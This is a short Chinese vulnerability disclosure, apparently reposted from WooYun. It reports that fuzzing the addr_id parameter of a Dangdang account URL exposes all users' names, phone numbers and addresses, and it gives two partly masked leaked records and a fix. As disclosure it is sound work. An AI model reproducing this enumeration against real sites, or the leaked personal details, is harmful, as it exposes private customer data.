当当网设计缺陷导致用户资料泄露及修复方案

简要描述：

某处设计不当，不能过于详细，太容易发现了，可导致所有用户的姓名，联系方式，地址等泄露

详细说明：

登陆后

http://account.dangdang.com/payhistory/myaddress.aspx?addr_id=10000&cid=1&op=bindselected

通过fuzz上面URL中得addr_id= 可以得到全部的收件地址

漏洞证明：

敏感信息用*代替了

{'addr_detail':'(家庭地址)先烈东横**************房','city_id':'5','country_id':'9000','cust_address_id':'10000','cust_id':'2645241','errorCode':0,'province_id':'144','ship_man':'谢楚*','ship_mb':'13580*******','ship_tel':'020-37245661','ship_zip':'510075','status':'-1','statusCode':0,'town_id':''}

{'addr_detail':'(家庭地址)回龙观***************室','city_id':'1','country_id':'9000','cust_address_id':'10001','cust_id':'3088863','errorCode':0,'province_id':'111','ship_man':'应*','ship_mb':'','ship_tel':'010-817*******','ship_zip':'102208','status':'2','statusCode':0,'town_id':''}

修复方案：

1对请求的用户判断该addr_id是否当前用户所有

2审计SQL语句，避免造成横向越权

www.2cto.com补充：当当已经出公告说修复了

摘自：北京基友团@乌云